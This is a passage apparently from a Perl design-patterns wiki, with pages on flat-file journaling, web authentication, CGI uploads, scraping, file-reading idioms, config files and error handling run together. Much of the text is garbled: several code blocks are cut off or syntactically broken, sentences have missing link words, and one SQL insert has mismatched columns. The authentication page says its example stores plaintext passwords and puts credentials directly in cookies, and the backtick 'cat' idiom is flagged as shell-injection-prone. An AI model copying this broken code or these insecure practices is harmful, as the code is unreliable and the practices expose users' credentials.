in open my $f, $file or die $!; my $k; my $v; while(<$f>) { chomp; %thingy = split /\||\=/, 'key='.$_; while(($k, $v) = each %thingy) { $filecache->{$file}->{$thingy{'key'}}->{$k} = $v; } } close $f; return 1; }, # fetch a value for a given key get => sub { my $file = shift; # which file the data is in my $thingy = shift; # which record in the file - row's primary key my $xyzzy = shift; # which column in that record $logic->openflatfile($file) unless(exists $filecache->{$file}); return $filecache->{$file}->{$thingy}->{$xyzzy}; }, keys => sub { my $rec = $filecache; while(@_) { $rec = $rec->{$_[0]}; shift; } if(wantarray) { keys %{$rec}; } else { $rec; } }, set => sub { my $file = shift; # which file the data is in my $thingy = shift; # which record in the file - row's primary key my $x = shift; # which column in that record my $val = shift; # new value to store there $filecache->{$file}->{$thingy}->{$x} = $val; $buffered->{$file}->{$thingy}->{$x} = $val; 1; }, close => %{$buffered->{$file}}) { $line = $thingy; foreach $x (keys %{$buffered->{$file}->{$thingy}}) { $line .= '|' . $x . '=' . $buffered->{$file}->{$thingy}->{$x}; } print F $line, "\n"; } $buffered->{$file} = (); close $f; }, recreate => %{$filecache->{$file}}) { $line = $thingy; foreach $x (keys %{$filecache->{$file}->{$thingy}}) { $line .= '|' . $x . '=' . $filecache->{$file}->{$thingy}->{$x}; } print $f $line, "\n"; } close F; rename "$file.$$", $file or die "$! on rename $file.$$ to $file"; }, } , $pack; } To use, do something like: use Xfor; my $hash = new Xfor; $hash->open('carparts.nvp'); # read: $hash->get('carparts.nvp', 'xj-11', 'muffler'); # which muffler does the xj-11 use? # write: $hash->set('cartparts.nvp', 'xj-11', 'muffler', 'c3p0'); # then later: $hash->close('carparts.nvp'); # or... $hash->recreate('carparts.nvp'); Xfor.pm reads files from beginning to end, and goes with the last value discovered. This lets us write by kind-of journeling: we can just tack updated information on to the end. we can also regenerate the file with only the latest data, upon request. Since we read in all data, we're none too speedy. Reading is as slow as Storable or the like, but writing is much faster. Data is written to the end of the file when the -close()> method is called. There are no fixed record lengths. We never go into the middle of a file and try to insert data. We don't move and regenerate the file unless explicitly asked to, and we only do that to keep it from getting too large. A tied-hash interface could be provided for persistant journaled storage without the clumbsy method interface. If a single value is needed, the entire file need not be read into memory - this case could be optimized. We use the vertical bar as a field deliminator - this is bound to cause problems unless either we escape them in strings, in which case the escape character must also be escaped when it occurs normally. Taking a approach is usually better than trying to escape things: include an explicit length and then use read() to read exactly that much data. "ExportingPattern" in ExportingPattern talks about creating a single default instance that can be used without explicitly naming an object, only using the correct methods. This example should also take a few arguments to the constructor and pass them to each method so that a default file or default file and default record can be specified. It isn't useful as a module as it stands, but illustrates the trade off between read time and write time that simple journaling approaches offer. See Also: perldoc perltie See Also:, "AnonymousSubroutineObjects" in AnonymousSubroutineObjects, Pages Linking to This Page: I'd rather write programs that write programs than write programs - says we should do something in only one place. In accordance with keeping our secret bits hidden away and not duplicated all over the place like a scandle on the tabloid front page. A Perl module would be expected to export these values and routines when used. A Java package would be expected to give an object reference that can be prodded with method calls and examination of package global and object instance fields. A Bourne shell script would spit out another shell script which it would then execute. Thats what I want to talk about. A lot of language rheteric tells us not to worry about the size of our applications. We should load all of the modules we need rather than ever thinking of copying and modifying a program or module. Like anything that says "always" or "never", this is dangerous. Rather than writing a clean implementation that loads a bazzilion modules, we'll sheepishly dumb down the specs, and set our expectations of the application low. We'll hardcode things for fear of creating modules. In short, we'll deal with module explosion problem by developing a neurotic adversion to creating more of the bastards. Each new candidate for modulehood seems to pale in comparison to the last 3 or 4 hundred modules that were endorced. The heart of the problem is with diverging applications, the kind we make when we copy one program to reuse it for another client, for instance. Conventional wisdom says to copy the entire thing and add on to it, in essence, without removing anything. There are two cross sections we're trying to cut the same application into at once: the cross section of the functionality we need for this client, and the cross section of how functionality within the application. Organizing the entire application by which logic may or may not be needed for future projects assumes knowledge we don't have, and it completely neglects organizing the objects by their relationship with each other - our primary reason for using objects. Organizing the entire application by its fuctional structure includes an undue amount of dependence between building blocks in an environment where the very purpose of the application can go two or more ways at once, as different clients have an application customized. In face, it is very rare it is even attempted that diverging versions will track each other., and selectively adapting code from each others projects is a good example. Even so, each BSD has gone in a different direction, introducing a very real element of manual labor in adapting code, dispite the histric common origins. Another exmaple is GNU autoconf. If you've ever installed Unix software from source code (Perl, perhaps?), you've probably downloaded a tarball, typed tar -xzvf foo.tar.gz, chdired into the directory, typed ./configure, then make. configure is a shell script, generated by GNU autoconf. Every time anyone needs to test for a new feature which may or may not be present in POSIX like operating environments as part of the build process the test for that feature is added to GNU autoconf. Okey, not every time, but this is the secret to GNU autoconf's success. Every application running the same configure script, which tested for everything would be unworkable. It would take hours to run on a fast computer, and do all sorts of work not needed. Configuring certain tests off would help, but you're still forcing poor bash* to read a several thousand line (several hundred thousand line long?) script when only a few may be needed. With open source software, programmers may be tolerant of lots of unrelated code or hooks kicking around. In the real world, clients don't want to know about each other. They're just happier that way*. Writing an application to write applications lets you put everything where it belongs, score high on tests, structure your code according a natural, logical criteria, and not bog clients down with a beast that is the sum of the size of all of its copies. This idea is nothing new. The concept of returning code is cornerstone of the Lambda programming style, and is also known as. We could, and otherwise should, use, but we're trying to exclude the code from ever going out the door. The idea is similar to generating a string of code and using <i>eval</i> on it, but once again, we're trying to keep the code from ever disgracing their harddrive. Using and breaks your module up into individual functions (methods) that are loaded on demand from strings stored past the __END__ of your program. XXX quick hack to look at an module and spit out select sections either as ready or as regular Perl code. - round this out, proof it, give it a few examples. See Also Do you want to send them an email with a generated password in it to validate their email address? - .htaccess Suited for a small number of users, each of which has the same permissions. User creation and maintenance involves modifying the file directly. - Cookies There are lots of formulas, but the winning one is: issue a cookie with an authorization token. Store the token in the database along with an expiration time seperate of the cookie. The token should be random generated and completely seperate from the password but handed out when the password is validated. This is the best case; if your porn addicted friend comes over and uses your computer, and steals your cookies.txt file when you aren't looking, cookies generated this way can't be used to discover the username or password used. The password change form could be used as a loophole though: if the token is still valid and the password change script doesn't explicitly double check the old password before letting you change it, a new password could be put in place for the account without your friend knowing the old one. It is best to always check that the user knows the old password before allowing them to change it to avoid this problem. Our example here doesn't do any of this. It merely hands out cookies that contain the literal username and password. Our passwords aren't stored encrypted in the database. See for an example of that. The examples are at the bottom of this section. - Munged links. Sometimes users don't have cookies turned on. In this case, you've got two options: tracking them by IP and including the session ID in all forms and links. Tracking users by IP is error prone, since entire companies traffic is often filtered through a firewall that uses network address translation to present all of the internal computers traffic as coming from one IP address. Inexpensive home "modem sharing" devices do exactly the same thing. Munging links requires that the session ID be constantly passed back to the scripts at every link or form: #. One dirty little trick that a programmer friend of mine (okey, it was me) used once (okey, several times) on mod_perl sites was having the handler parse .html files with embedded perl, and munge all of the links - from both the .html and the perl output: You prolly want to plan from the beginning to have a bunch of small .cgi scripts instead of one huge monolithic one... so you'll want to make a sort of "validateuser.pm" file and "use validateuser.pm;" at the top of each .cgi. # offer module. That module creates recursive routines that communicate using global variables - ick. I need to change that, and then this example. Then I'll put that code up. XXX. Back to "PerlDesignPatterns" in PerlDesignPatterns. $Id: "WebAuthentication" in WebAuthentication,v 1.9 2003/02/23 19:07:42 httpd Exp $ Pages Linking to This Page: Common application feature, for CGI applications. Users select files, using a form element in their web browser, and when they submit, that file is uploaded to the server with the rest of the form data. <gogamoga> well, i`ll ask: how do i fetch attached file from the query? <scrottie> ask to ask? <Perl-fu> Don't ask to ask. Don't ask if anybody can help you with x. Just ask! Omit any irrelevant details. If nobody answers then we don't know or are busy for a few minutes. Wait and don't bug us. If you must ask again wait until new people have joined the channel. <scrottie> my $fh = CGI::upload($fn); my $buffer; while (read($fh,$buffer,length($buffer)) { }; <scrottie> where $fn is the name of the CGI param. make sure the from has the right enctype. <scrottie> i don't remember the enctype, but "perldoc CGI" will tell you <scrottie> unless the form uses that special enctype, file uploads won't be uploaded, rather mysteriously <gogamoga> THANK YOU SOOOOOOOOO MUCH <gogamoga> i got lost in cgi.pm reference :( <scrottie> heh, you're welcome. let me know if you get stuck. <scrottie> yeah, someone really needs to slim that down. <gogamoga> i use only jpg enctype so i wont even check it <gogamoga> just fetch the file and save it <scrottie> you don't understand. <scrottie> hang on. let me find it. <gogamoga> ok <scrottie> if your form doesn't say <form method="post" enctype="multipart/form-data">, then <input type="file"> tags wont work. they won't upload the file. <scrottie> reguardless of the type of the file, the file won't be uploaded. <scrottie> Netscape 2 introduced the ability to upload files, and in order to support this feature, they had to introduce a new format for sending data to the server - the old application/x-www-form-urlencoded one couldn't handle large blocks of arbitrary data <gogamoga> ah <gogamoga> damn, it wont upload it but it still takes ages as it uploads it :) <gogamoga> ah, sorry i am dumb <scrottie> no, we all have to work through the standard mistakes ;) <gogamoga> dreamweaver adds multipart/form-data by default <gogamoga> :) <scrottie> good. no one uses Netscape 1 anymore ;) has an example of serving binary objects as images from a CGI script. This can easily be coupled with database BLOBs to store images in the database, and serve them as normal images from a CGI script. See Also "WebScraping" is extracting information from the Web. Picking out information from web pages and using it in an appliction is said to be scraping the data. Usually refers to harvesting live data feeds or minipulating specific applications via the Web. Also known as or, especially when one type of information is sought across the entire web. Use LWP to fetch web pages using URLs. See example HTML parser in "RunAndReturnSuccessor" in RunAndReturnSuccessor. use TransientBaby::Forms; use TransientBaby; my $accessor; my %opts; my @table; my $tablerow; my $tablecol = -1; parse_html($document, sub { $accessor = shift; %opts = @_; if($opts{tag} eq 'tr') { # create a new, blank array entry on the end of @table $tablerow++; $table[$tablerow] = []; $tablecol = 0; } elsif($opts{tag} eq 'td') { # store the text following the <td> tag in $table[][] $table[$tablerow][$tablecol] = $accessor->('trailing'); $tablecol++; } }); I've gone out of my way to avoid the nasty push @{$table[-1]} construct as I don't feel like looking at it right now. $tablerow and $tablecol could be avoided otherwise. This code watches for HTML table tags and uses those to build a 2 dimentional array. Data taken from a database and presented in HTML tables was normalized in the database, but is denormalized for display. When it is denormalized, data from several relational tables is presented as one table. In this case, there may be different views of the data, each driven by a differenet query or different query parameters. See "ObjectsAndRelationalDatabaseSystems" in ObjectsAndRelationalDatabaseSystems for more on normalization. If we're putting the harvested data back into a database to report on, it suits us to reconstruct some structure to it. select table1.a, table2.b, table3.c from table1, table2, table3 where table1.id = table2.id and table2.param = table3.id order by table1.a, table2.b, table3.c We can't recover the id or param fields from the output of this query, but we can generate our own. Joining between three tables flattens the extracted data down to one. This sort of joining has a tell-tale pattern in its output, in that the columns appear to count. The first n columns are from tablea, second so many from tableb, and so on. aaa aab aac aad aba aca ada baa bab (And so on...) Add this clause to the if statement in the sub passed to parse_html() above, remembering to declare the introduced variables in the correct scope: } elsif($opts{tag} eq '/tr') { if(!$tablerow or $table[$tablerow][0] ne $table[$tablerow-1][0]) { $dbh->execute("insert into tablea (a) values (?)", $table[$tablerow][0]); $table_a_id = $dbh->insert_id(); # else $table_a_id will retain its value from the last pass } if(!$tablerow or $table[$tablerow][1] ne $table[$tablerow-1][1]) { $dbh->execute("insert into tableb (b, id) values (?, ?)", $table[$tablerow][1], $table_a_id); $table_b_id = $dbh->insert_id(); # else $table_b_id will retain its value from the last pass } if(!$tablerow or $table[$tablerow][2] ne $table[$tablerow-1][2]) { $dbh->execute("insert into tablec (c) values (?, ?)", $table[$tablerow][1], $table_b_id); $table_c_id = $dbh->insert_id(); # else $table_c_id will retain its value from the last pass } } This code depends on $dbh being a properly initialized database connection. I'm using -insert_id()>, a extention, for clarity. Unlike the previous code, this code is data-source specific. Only a human looking at the data can deturmine how best to break the single table up into normalized, relational tables. We're assuming three tables, each having one column, aside from the id field. Assuming this counting pattern, we insert records into tablec most often, linking them to the most recently inserted tableb record. tableb is inserted into less frequently, and when it is, the record refers to the most recently inserted record in tablea. When a record is inserted into tablea, it isn't linked to any other records. XXX Todo: See Also Problem: Perl gives so many ways to read a file, so many of them bad. Solution: Know the bad ones. An Old Idiom in Poor Style { local $/ = undef; open FH, "<$file"; $data = <FH>; close FH; } Pros: Everyone seems to know this one. Reads in entire file in one gulp without an array intermediary. Cons: $data cannot be declared with my because we have to create a block to localize the record seperator in. Ugly. A Short and Sweet Idiom @ARGV = ($file); my $data = join '', <>; Pros: Short. Sweet. Cons: Clobbers @ARGV, poor error handling, inefficient for large files. Shell-Holdout Idiom my $data = `cat $file`; Pros: Very short. Makes sense to sh programmers. Cons: Secure problem - shell commands may be buried in filenames. Creates an additional process - poor performance for files small and large. No error handling. Is not portable. Read/Sysread Idiom open my $fh, '<', $file or die $!; read $fh, my $data, -s $fh or die $!; close $fh; Pros: Good error handling. Reasonably short. Efficient. Doesn't misuse Perl-isms to save space. Uses lexical scoping for everything. Cons: None. Mmap Idiom use Sys::Mmap; new Mmap my $data, -s $file, $file or die $!; Pros: Very fast random access for large files as sectors of the file aren't read into memory until actually referenced. Changes to the variable propogate back to the file making read/write, well, cool. Cons: Requires use of an external module such as Sys::Mmap ( Mmap), file cannot easily be grown. Difficult for non-Unix-C programmers to understand. Problem: Reading configuration data from a file that users can edit and have written back to disc. Using require to read config files is handy, but many people feel they've outgrown using it, so they write elaborate modules to handle configuration. Solution: Hot-rod require with advanced features to the degree it makes sense before resorting to complex or do-it-yourself replacements.. Configuration is one of those sore spots that the limits of are continuously pushed by users. Most Perl programmers give up their old config.pl when requirements specify a spiffy Web or Tk interface for users to change settings. No more! # config.pl: $config = { widgets=>'max', gronkulator=>'on', magic=>'more' }; # configTest.pl: use Data::Dumper; require 'config.pl'; $config->{gronkulator} = 'no, thanks'; open my $conf, '>config.pl' or die $!; print $conf Data::Dumper->Dump($config); close $conf; Data::Dumper ( Dumper).pm comes with Perl, and can even store entire objects. In fact, it can store networks of object. Security may be a concern. If you don't want Perl in configuration files to gain the priviledge of your program, use the Safe module or. If the program is running as a as the superuser, or the Safe module. If the program is setuid and the people running it don't have access to edit it, use the Safe module or. Finding the Config or Data Directory Something that is reasonably portable between Unix and Win is to look for an environment variable telling you where to go for the data. msconfig.exe lets you set startup environment variables and a lot of unix programs (cvs, postgres, etc) use environment variables to find their data if it isn't passed on the command line. Polluting the environment in Unix is considered bad form by many, and dropping something in /etc isn't portable, so go fish. Active Config Closures are useful for doing config options that have behavior: $dumping = "xterm -display $display"; You could (if you wanted) make that a closure. That would let you use the multiple arg version of system(), which is good security practice, and the closure would bind to my variables, so if the config changes at run time, they change there too. $dumping = sub { system 'xterm', $arg, $arg; }; XXX - dumping active config using B::Deparse See Also Die Early, Die Often Catch errors before you get far away, or unrelated code will appear to malfunction, as a horrible form of "ActionAtADistance" in ActionAtADistance. In the process of debugging, you're going to need to insert lots of tests anyway, so why not do it neatly from the beginning and integrate it into your program? When the program is in production is when error reporting is most needed, if users or logs are going to communicate the nature of the problem to you to be fixed. See "RunAndReturnSuccessor" in RunAndReturnSuccessor and for a description of checkpointing an application to recover from otherwise fatal errors. eval { } is used for trapping errors - see "AssertPattern" in AssertPattern. open my $f, 'file.txt' or die $!; or die should litterally dot your code. Thats how you communicate to Perl and your readership that it is not okey for the statement to silently fail. Most languages make such error geeration default; in Perl, you must request it. This is no excuse for allowing all errors to sneak by silently. Should you not have the constitution to speckle your code with or die clauses, or you're a minimalist, striving for elegance, there is a solution: # from the Fatal.pm perldoc: use Fatal qw(open close); sub juggle { . . . } import Fatal 'juggle'; Fatal.pm will place wrappers around your methods or Perl built in methods, changing their default behavior to throw an error. A module which does heavy file IO on a group of files need not check the return value of each and every open(), read(), write(), and close(). Only at key points - on method entry, entry into worker functions, etc - do you need to handle error conditions. This is a more reasonable request, one easily acheived. Should an error occur and be cought, the text of the error message will be in $@. use Fatal qw(open close read write flock seek print); sub update_data_file { my $this = shift; my $data = shift; my $record; local *filename = \$this->{filename}; local *record = \$this->{record}; eval { open my $f, '>+', $filename; flock $f, 4; seek $f, $record, 0; print $f, $data; close $f; }; return 0 if $@; # update failed return 1; # success } Alternatively, rather than using eval { } ourselves, following "AssertPattern" in AssertPattern, we could trust that someone at some point installed a __DIE__ handler. The most recently installed local handler gets to try to detangle the web. sub generate_report { local $SIG{__DIE__} = { print "Whoops, report generation failed. Tell your boss it was my fault. Reason: ", @_; } foreach my $i ($this->get_all_data()) { $data->update_data_file($i); } } sub checkpoint_app { local $SIG{__DIE__} = { print "Whoops, checkpoint failed. Correct problem and save your data. Reason: ", @_; } $data->update_data_file($this->get_data()); } Using local scoped handlers this way allows you to provide context-sensitive recoverory, or atleast diagnostics, when errors are thrown. This is easy to do and all that is required to take full advantage of Fatal.pm. Fatal.pm was written by [email protected] with prototype updates by Ilya Zakharevich [email protected]. Time-Outs Use alarm() with eval(): RETRY: eval { alarm 30; # send a $SIG{ALRM} after 30 seconds - default is death # do something that might time-out alarm 0; # disable alarm }; if($@) { # there was an error - error text is in $@ - do what you will - perhaps retry: goto RETRY; } select() provides an alternative for timeouts on I/O, and is especially safe when coupled with non-blocking I/O. See "SelectPollPattern" in SelectPollPattern. Throwing Objects. - at, See Also Use die() Avoid temptation to write a new death-handler and call it by name in place of die(): # don't do this sub barf { print "something went wrong!\n", @_; exit 1; } # ... barf("number too large") if($number > $too_large); die() has a useful default behavior that depends on no external modules, but can easily be overriden with a handler to do more complex cleanup, reporting, and so on. If you don't use die(), you can't easily localize which handler is used in a given scope. Every Error, Great And Small warn() provides a reasonable default for reporting potential errors. Programs run at the command line get warn() messages sent to stderr. CGI programs get warn() messages sent to the error log, under Apache and thttpd [37]. Using CGI::Carp ( Carp), warnings are queued up for display in the event of a die(), thus making important debugging information available. Even reasonable defaults aren't always what you want. Without changing your code [38], the behavior of warn() and die() can be changed: # send diagnostic output to the end of a log open my $debug, '>>bouncemail.debug'; $SIG{__WARN__} = sub { print $debug $_, join(" - ", @_); }; $SIG{__DIE__} = sub { print $debug $_, join(" - ", @_); exit 0; }; Some logic will want to handle its own errors - some times a fatal condition in one part of code doesn't really matter a hill of beans on the grand scale of the application. A command line print utility may want to die if the printer is off line [39] - a word processor probably does __not__ want to exit with unsaved changes merely because the document couldn't be printed. So, do this: local $SIG{__DIE__} = sub { # yeah, whatever }; # or... local $SIG{__DIE__} = 'IGNORE'; ...or, do the error processing of your choice. Perhaps set a lexically bound variable flag - see. Report Everything In the event of a fatal error, display as much information as possible about the current execution context. # intercept death long enough to scream bloody murder $version = '$Id: ErrorReporting,v 1.20 2003/05/15 09:58:41; }; A software error has occured. Give the user an out. I wish I could remember what book this was from - the St. Thomas University library in St. Paul, Minnesota had it, but the author quoted a conversation that went something like... I noticed a contingency in the code, so I went to the client and asked him how I should handle it. He said, "Oh, that won't happen, it doesn't matter". Dumbfounded, knowing full well that it might happen, I said, "Oh, so if the program reaches this point, it is okey to drop the database, delete all of the data, lock up, and stop responding without printing any diagnostic message? The client reeled back aghast and exclaimed, "No! You can't do that!". I said, unless we put some code in here to handle this situation, thats exactly what might happen! Now, when the code reaches this point, how should we handle it? Poping up a form that asked for contact information rather than a credit card, and transmits it insecurely along with the contents of the cart is our solution. Perhaps their order wasn't complete - thats okey. Atleast the system knew it failed and did something reasonable. See Also, Problem: Supporting features, such as protocols, that don't yet exist. Solving general problems without concern for the specifics of details. Solution: Synopsis: Provide a framework certain kind of task. Frameworks A "framework" uses other modules. Normal modules have a fixed set of dependencies and are only extended through subclassing, as per "AboutInheritance" in AboutInheritance. A framework may consist of several parts that must be inherited to be used much like several cases of "AbstractClass" in AbstractClass. It may also be passed references to other objects, as would a class thats sets up a. It may read names of classes from a "ConfigFile" in ConfigFile or from the user, as in. Instead of code being used by other code, it will use other code on the fly. It is on top of the food chain instead of the bottom. XXX examples of these cases as "extensibility". Configuration Files as Extentions A "ConfigFile" in ConfigFile may be enough to customize the module for reasonable needs. It may also specify modules by name to be created and employed in a framework. # the config.pl file defines @listeners to contain a list of class names # that should receive notices from an EventListener broadcaster, # referenced by $broadcaster. require 'config.pl'; foreach my $listener (@listeners) { require $listener; my $list_inst = $listener->new(); $broadcaster->add_listener($list_inst); } See for the broadcaster/listener idiom. This avoids building the names of listener modules into the application. An independent author could write a plug-in to this application: she would need only have the user modify config.pl to include mention of the plug-in. Of course, modification of config.pl could be automated. The install program for the plug-in would need to ask the user where the config.pl is, and use the "ConfigFile" in ConfigFile idiom to update it. Extending Through Scripting A major complaint against GUIs is that they make it difficult to script repetitive tasks. Command line interfaces are difficult for most humans to work with. Neither give rich access to the API of a program. A well designed program is a few lines of Perl in the main program that use a number of modules - see. This makes it easier to reuse the program logic in other programs. Complex programs that build upon existing parts benefit from this, without question. How about the other case - a small script meant to automate some task? This requires that the script have knowledge about the structure of the application - it must know how to assemble the modules, initialize them, and so on. It is forced to work with aspects of the API that it almost certainly isn't concerned with. It must itself be the framework. This is a kind of "AbstractionInversion" in AbstractionInversion - where something abstract is graphed onto something concrete, or something simple is grafted onto the top of something complex. It would make more sense in this case for the application to implement a sort of "VisitorPattern" in VisitorPattern, and allow itself to be passed whole, already assembled, to another spat of code that knows how to perform specific operations on it. This lends itself to the sequential nature of the script: the user defined extention could be a series of simple calls:" in FacadePattern providing an interface to it - is passed to the run_macro() method of an instance of that package. Many applications will have users that want to do simple automation without being bothered to learn even a little Perl (horrible but true!). Some applications (like Mathematica, for instance) will provide functionality that doesn't cleanly map to Perl. In this case, you'd want to be able to parse expressions and minipulate them. In these cases, a may be just the thing. XXX - move this to. A is a small programming language created specifically for the task at hand. It can be similar to other languages. Having something clean and simple specifically targetted at the problem can be better solution than throwing an overpowered language at it. Just by neglecting unneeded features, user confusion is: Out of context, the string "xyzzy" could be either a parameter or the name of a method to call. The solution is simply to keep track of context: that is where $state comes in. Every time we find something, we update $state to indicate what class of thing would be valid if it came next. After we find a function name and an opening paranthesis, either a hash style parameter or a single, lone parameter, or else a close paranthesis would be valid. We aren't even looking for the start of another function [40]. After a parameter, we're looking for either the close paranthesis or another parameter. Every time we match something, we append a Perl-ized version of exactly the same thing onto $perl. All of this is wrapped in a package and method declaration. Finally, $perl is evaluated. The result of evaluating should be to make this new package available to our code, ready to be called. XXX a B::Generate exmaple! ... but in Beans as Extentions XXX a B::Generate exmaple! Hacks as Extentions When a base application, or shared code base, is customized in different directions for different clients. Making heavy use of and, localizing client specific code into a module or tree of modules under a client-specific namespace rather than "where it belongs". See. See Also When programming, you take a generic algorithm and customize it for a task. Sometimes you have a copy of an implementation of that algorithm laying around that you can copy. OO tells us not to do that. Someone once said, "If you're going to make a mistake, make it in a big way". Keeping one sacred copy that must be correct could certainly accomplish that. However, it makes it possible to fix a problem once instead of having it spread around the code. Having code replicated is a huge commitment. You're banking that nothing is wrong with it, that your program will never change how the data it works on is represented, and that people like looking at endless permutations of a single piece of code. Object Orientation proposes to eliminate this. The act of separating your program into objects creates a ripe new area for endless duplication: sequences of setting, querying, and passing data. A common situation: . Snafus like this cause the number of accessors to grow to accommodate all of the permutations of accessing the data. You'll often see a set_ function, a query_ or get_ function, and add_ function, for each value we encapsulate.. 1. Applies only to this particular client: Leave the server's accessors in the client, in this case, Casino. 2. Nearly every client can benefit from this code: Put the logic in the server, in this case, $player. 3. Applies to a special case of clients: Consider a Facade for $player. Not worth it? Toss up between #1 and #2. 3. Applies to a special case of servers: Subclass $player's package. Its okay to do it "wrong". Each new thing that gets built will give you more and more insight into how things really need to be able to work. The important thing is to continue to incorporate these lessons into the code, to keep the code in line with reality, and never be afraid of breaking your code. If you're afraid of breaking your code in name of making it better, it has you hostage. If you're afraid of breaking it because you think it'll take too long to fix it to work again after the change, it has already grown rigid, and only frequently breaking and fixing it will allow it to regain its flexibility. Take Jackie Chan, for instance. Having broken countless bones, he's only gotten stronger, braver, and apparently, more skilled at walking on a broken leg, more knowledgeable about his limits, and adept at healing. Alternatively, if you're afraid of subtle bugs creeping in undetected, you've got murky depths syndrome. Perhaps a lot of it is poorly understood Lava Flow code, that was laid down once, built on top of, and has become permanent for it. Reading through the dark murky code is a good start. A pass now and then keeps the possibilities and implications fresh in your mind. However, this is time consuming and will ultimately miss implications. There is no substitute for knowledge of the code, and neither is there substitute for testing. There is a special class of code where every bit of logic is exersized every execution. Mathematical modeling applications that work on large, well understood, datasets fit this description. Any subtle bug would give dramatic bias in the output as soon as the buggy program were run. Normal programs doesn't have this luxury - their bugs lurk for ages, possibly until maintaince headaches dictate it be abandoned and rewritten. We can't understand everything in a large program, but we can contrived data sets and test applications that work out every feature of our module. Writing artificial applications that use our modules, and coming up with bizarrely improbably-in-every-way datasets simulates the "luxury" case where all of the dark murky depths are used every run, in our case, every test run. The only time dark murky depths and Lava Flow code, the code most in need of a refactor, can be attacked is when we have a definitive method for discovering whether or not we've broken it. "Measure twice, cut once". If you're anything like me, you like flying by the seat of your pants. If you go to the movies or watch the tele, you know that every fighter pilot struggles with this issue: do I trust my intuition and wing it, or do I go by the book? Luke Skywalker destroyed the Death Star without that damn useless targeting computer. The architects that built skyscrapers certainly have to think outside of the box, so to speak, to come up with techniques and ideas for building beyond the bounds of what is believed possible, but no one would trust an architect that couldn't back up his gut instincts with cold, hard math. Solution? Code with your heart, but be the first to know when you make the inevitable wrong guess. Write seat of your pants code, but write first class scientific tests. Cut and paste code is a sign of larger problems. Categories See Also Premature optimization is the root of all evil. Don't optimize for bugs. Don't optimize for poor implementations of language interpreters. Don't optimize a naive implementation. All of these things will change right out from under you. Code that is dependent on something broken for speed will run slower when the real problem is fixed. Optimization isn't evil - only premature optimization is. In each of these examples, if the more general case is optimized rather than specific cases, everything is right in the world. People failing to see the bigger picture are the ones causing grief. If you think you see the bigger picture, you almost certainly don't. Like a good security consultant, a good programmer is pessimistic about everything. I won't bore you with statistics about computers becoming faster faster than you can change your code. The fact is, there is a niche for squeezing the last drop of performance out of an application. This nitche shows people what they could do if only their computer were a little faster, and it drives hardware performance. The conclusion to draw from this is: If there is a quicker way to do something in Perl that is less readable or requires jumping through hoops, it is a bug in the more readable implementation, and the more readable implementation will soon be fixed. Write good Perl. Let Perl do its thing. There are some optimizations which are considered good style, and therefore aren't premature: See Also "If I use the Object Oriented features, I must be benefiting from them". OO is no silver bullet. It isn't a cure all and it isn't impossible to do more harm than good with it. Its a good indication that something has gone wrong if it is adding complexity rather than removing. Remember, keep it simple. When it becomes clear how to refactor your code, do so then, not before. Can interchangeable objects be used interchangeably? Can one object be replaced with several objects? If not, consider adding a common Interface Type to the like objects, and creating an Abstract Factory to create and return the correct one for any given situation. Think of saving files using one of many filters. Are objects being used purely to hold values? You've probably got one or two big fat Big Ball Of Mud objects. Start moving logic out into the package that contains the data it most closely identifies with. Insert shims to keep everything running, that delegate the method call to the object, if you must, and experiment with removing the shim over time. If nothing else, this sets a precedent, and new code can be written immediately in the new, correct way, rather than more and more code accumulating using the old, ugly approach. Can you remove an object from the system without breaking every other object? If not, they are too interdependent, with very few exceptions. Even with the Microsoft Windows operating system, something like "the registry" sounded like a great idea at first. Any program, as well as the operating system, could store configuration and run time data in a central database. In practice, it creates a single point of failure, frequently sustaining damage that causes the entire system to need to be restored from backup or reinstalled. The file grows too large and the operating system fails on any attempt to grow it beyond the limit of the max file size. Windows was designed with the register being a core, unchanging idea, but in retrospect, it may have been better if it weren't an absolute. Examining your code for objects which absolutely cannot be removed provides great insight into over dependence. If every object is dependent on every other object, object orientation is doing nothing for you. If any object can be removed with minimal damage to the overall structure, you have something healthy and organic. See Also Procedural code converted to OO lends itself to one main object with lot of little objects hung off of it. The interdependency in the code doesn't change, and objects don't become noticeably autonomous. Like things may be grouped together, but for the wrong reasons: historically they have been used in sequence, or they form an implementation and interface wrapped together.. - 4 Also known as a Stove Pipe System, as apparently stove pipes were prone to corrosion and needed frequent repair with whatever was at hand, creating a discombobulated kludge. An ill-assorted collection of poorly matching parts, forming a distressing whole. - Jackson Granholme The problem with retrofits is they are typically hastily done and never improved before the next story is built. They come under an immediate pressing concern that overwhelms any reasonable ability to think of the future. Indeed, the future won't exist at all for the project if the retrofit isn't done. Not even in Las Vegas are floors built so aggressively. Reguardless of whether you're in the Windows camp or the Unix camp, you're using an operating system built for a 16 bit system that has been retrofit, but never actually completely rewritten. Other operating systems have equally as interesting stories - 1 through 9 were written for a 32 bit native address space, but memory protection was retrofit, while Unix was written for a 16 bit address space and retrofit for 32, but incorporated memory management from the beginning. was originally Tripos, but was written in BCPL, a language that had one data unit - the machine word - making the conversion to a 32 bit processor and system bizarrely easy, while making mundane programming tasks bizarrely painful. C later grew out of BCPL, where it cleaned up the syntax, introduced subscripts on arrays of different sized units of memory, then later structs, unions, and countless other modern marvels - but all of this is neither here nor there. Refactor mercilessly - Systems can effectively be adapted, and in order to build very far at all, you almost have to adapt an existing system. Adaption cannot be sustained without time spent making fundamental changes - see - but fundamentally it is a better investment to maintain and adapt existing systems rather than rewrite them. Most spectacular software industry failures arose from failure to maintain systems followed by an attempt to rewrite them from scratch. Most successes can trace their code back to the 1970s: The SAS system, Unix, DB2, and Signaling System 7, for example. states that it takes 10 years to write a program. I'd place that as a minimum. Most software starting life in the 1970s is now rock solid, mature, and portable. Most programs that started life in the mid-1980s are still having growing pains, stability problems, and their owners can't bare the expense of porting them. Perl allows you to quickly create applications. Perl itself could be considered a "BigBallOfMud" in BigBallOfMud, with complexity oozing out every pore. Perl has been around longer than 10 years. A large part of the code reuse of a script is from the interpreter itself. Writing an interpereter is one way of writing an API for code reuse. This gives significant lead time on small scripts, but growing and changing applications hit a ceiling even quicker because of this accelerated start. Perl scripts quickly reach the point where they need to be detangled. "GodObject" in GodObject has specific steps for migrating code and data out of a monolithic object. <s>This exhibits "LayeringPattern" in LayeringPattern, Polymorphism, "LooseCoupling" in LooseCoupling, "CommandObject" in CommandObject, Routing, and patterns. </s> See "PerlDesignPatterns" in PerlDesignPatterns for the table of contents No one understands it, so no one refactors it. Just as it is almost impossible to untangle a plate of spaghetti, code with no visible structure and no logical structure is daunting. Structured Programming contributed to the world the idea that the code should visibly reflect its logical structure: this was the birth of indenting. Previously, a goto would bounce back a few lines in flow, and another one somewhere in the middle would bounce you past the last 